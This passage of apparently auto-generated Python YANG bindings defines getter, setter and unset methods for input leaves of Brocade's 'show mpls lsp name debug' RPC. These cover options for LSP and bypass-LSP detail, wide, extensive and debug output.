'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_name = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_name(self):
self.__lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_lsp_name_extensive(self):
"""
Getter method for lsp_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_name_extensive (boolean)
YANG Description: Show one lsp extensive info by name
"""
return self.__lsp_name_extensive
def _set_lsp_name_extensive(self, v, load=False):
"""
Setter method for lsp_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_name_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_name_extensive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_name_extensive() directly.
YANG Description: Show one lsp extensive info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-name-extensive", rest_name="lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_name_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-name-extensive", rest_name="lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_name_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_name_extensive(self):
self.__lsp_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-name-extensive", rest_name="lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_name_debug(self):
"""
Getter method for lsp_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_name_debug (boolean)
YANG Description: Show one lsp extensive debug info by name
"""
return self.__lsp_name_debug
def _set_lsp_name_debug(self, v, load=False):
"""
Setter method for lsp_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_name_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_name_debug is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_name_debug() directly.
YANG Description: Show one lsp extensive debug info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-name-debug", rest_name="lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_name_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-name-debug", rest_name="lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_name_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_name_debug(self):
self.__lsp_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-name-debug", rest_name="lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp(self):
"""
Getter method for bypass_lsp, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp (string)
YANG Description: Show all bypass-lsps in brief
"""
return self.__bypass_lsp
def _set_bypass_lsp(self, v, load=False):
"""
Setter method for bypass_lsp, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp() directly.
YANG Description: Show all bypass-lsps in brief
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="bypass-lsp", rest_name="bypass-lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp", rest_name="bypass-lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__bypass_lsp = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp(self):
self.__bypass_lsp = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp", rest_name="bypass-lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_bypass_lsp_wide(self):
"""
Getter method for bypass_lsp_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_wide (boolean)
YANG Description: Show all bypass-lsps in brief and wide
"""
return self.__bypass_lsp_wide
def _set_bypass_lsp_wide(self, v, load=False):
"""
Setter method for bypass_lsp_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_wide (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_wide is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_wide() directly.
YANG Description: Show all bypass-lsps in brief and wide
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-wide", rest_name="bypass-lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_wide must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-wide", rest_name="bypass-lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_wide = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_wide(self):
self.__bypass_lsp_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-wide", rest_name="bypass-lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_detail(self):
"""
Getter method for bypass_lsp_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_detail (boolean)
YANG Description: Show all bypass-lsps in detail
"""
return self.__bypass_lsp_detail
def _set_bypass_lsp_detail(self, v, load=False):
"""
Setter method for bypass_lsp_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_detail (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_detail is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_detail() directly.
YANG Description: Show all bypass-lsps in detail
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-detail", rest_name="bypass-lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_detail must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-detail", rest_name="bypass-lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_detail = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_detail(self):
self.__bypass_lsp_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-detail", rest_name="bypass-lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_extensive(self):
"""
Getter method for bypass_lsp_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_extensive (boolean)
YANG Description: Show all bypass-lsps in extensive
"""
return self.__bypass_lsp_extensive
def _set_bypass_lsp_extensive(self, v, load=False):
"""
Setter method for bypass_lsp_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_extensive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_extensive() directly.
YANG Description: Show all bypass-lsps in extensive
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-extensive", rest_name="bypass-lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-extensive", rest_name="bypass-lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_extensive(self):
self.__bypass_lsp_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-extensive", rest_name="bypass-lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_debug(self):
"""
Getter method for bypass_lsp_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_debug (boolean)
YANG Description: Show all bypass-lsps in extensive debug
"""
return self.__bypass_lsp_debug
def _set_bypass_lsp_debug(self, v, load=False):
"""
Setter method for bypass_lsp_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_debug is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_debug() directly.
YANG Description: Show all bypass-lsps in extensive debug
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-debug", rest_name="bypass-lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-debug", rest_name="bypass-lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_debug(self):
self.__bypass_lsp_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-debug", rest_name="bypass-lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_name(self):
"""
Getter method for bypass_lsp_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_name (string)
YANG Description: Show one bypass-lsp detailed info by name
"""
return self.__bypass_lsp_name
def _set_bypass_lsp_name(self, v, load=False):
"""
Setter method for bypass_lsp_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_name() directly.
YANG Description: Show one bypass-lsp detailed info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="bypass-lsp-name", rest_name="bypass-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-name", rest_name="bypass-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__bypass_lsp_name = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_name(self):
self.__bypass_lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-name", rest_name="bypass-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_bypass_lsp_name_extensive(self):
"""
Getter method for bypass_lsp_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_name_extensive (boolean)
YANG Description: Show one bypass-lsp extensive info by name
"""
return self.__bypass_lsp_name_extensive
def _set_bypass_lsp_name_extensive(self, v, load=False):
"""
Setter method for bypass_lsp_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_name_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_name_extensive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_name_extensive() directly.
YANG Description: Show one bypass-lsp extensive info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-extensive", rest_name="bypass-lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_name_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-extensive", rest_name="bypass-lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_name_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_name_extensive(self):
self.__bypass_lsp_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-extensive", rest_name="bypass-lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_name_debug(self):
"""
Getter method for bypass_lsp_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_name_debug (boolean)
YANG Description: Show one bypass-lsp extensive debug info by name
"""
return self.__bypass_lsp_name_debug
def _set_bypass_lsp_name_debug(self, v, load=False):
"""
Setter method for bypass_lsp_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_name_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_name_debug is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_name_debug() directly.
YANG Description: Show one bypass-lsp extensive debug info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-debug", rest_name="bypass-lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_name_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-debug", rest_name="bypass-lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_name_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_name_debug(self):
self.__bypass_lsp_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-debug", rest_name="bypass-lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_static(self):
"""
Getter method for bypass_lsp_static, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static (string)
YANG Description: Show all static bypass-lsps in brief
"""
return self.__bypass_lsp_static
def _set_bypass_lsp_static(self, v, load=False):
"""
Setter method for bypass_lsp_static, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_static() directly.
YANG Description: Show all static bypass-lsps in brief
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="bypass-lsp-static", rest_name="bypass-lsp-static", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-static", rest_name="bypass-lsp-static", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__bypass_lsp_static = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static(self):
self.__bypass_lsp_static = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-static", rest_name="bypass-lsp-static", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_bypass_lsp_static_wide(self):
"""
Getter method for bypass_lsp_static_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_wide (boolean)
YANG Description: Show all static bypass-lsps in brief and wide
"""
return self.__bypass_lsp_static_wide
def _set_bypass_lsp_static_wide(self, v, load=False):
"""
Setter method for bypass_lsp_static_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_wide (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_wide is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_static_wide() directly.
YANG Description: Show all static bypass-lsps in brief and wide
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-wide", rest_name="bypass-lsp-static-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_wide must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-wide", rest_name="bypass-lsp-static-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_static_wide = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_wide(self):
self.__bypass_lsp_static_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-wide", rest_name="bypass-lsp-static-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_static_detail(self):
"""
Getter method for bypass_lsp_static_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_detail (boolean)
YANG Description: Show all static bypass-lsps in detail
"""
return self.__bypass_lsp_static_detail
def _set_bypass_lsp_static_detail(self, v, load=False):
"""
Setter method for bypass_lsp_static_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_detail (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_detail is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_static_detail() directly.
YANG Description: Show all static bypass-lsps in detail
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-detail", rest_name="bypass-lsp-static-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_detail must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-detail", rest_name="bypass-lsp-static-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_static_detail = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_detail(self):
self.__bypass_lsp_static_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-detail", rest_name="bypass-lsp-static-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_static_extensive(self):
"""
Getter method for bypass_lsp_static_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_extensive (boolean)
YANG Description: Show all static bypass-lsps in extensive
"""
return self.__bypass_lsp_static_extensive
def _set_bypass_lsp_static_extensive(self, v, load=False):
"""
Setter method for bypass_lsp_static_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_extensive is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_static_extensive() directly.
YANG Description: Show all static bypass-lsps in extensive
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-extensive", rest_name="bypass-lsp-static-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-extensive", rest_name="bypass-lsp-static-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_static_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_extensive(self):
self.__bypass_lsp_static_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-extensive", rest_name="bypass-lsp-static-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_static_debug(self):
"""
Getter method for bypass_lsp_static_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_debug (boolean)
YANG Description: Show all static bypass-lsps in extensive debug
"""
return self.__bypass_lsp_static_debug
def _set_bypass_lsp_static_debug(self, v, load=False):
"""
Setter method for bypass_lsp_static_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_debug is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_bypass_lsp_static_debug() directly.
YANG Description: Show all static bypass-lsps in extensive debug
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-debug", rest_name="bypass-lsp-static-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-debug", rest_name="bypass-lsp-static-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_static_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_debug(self):
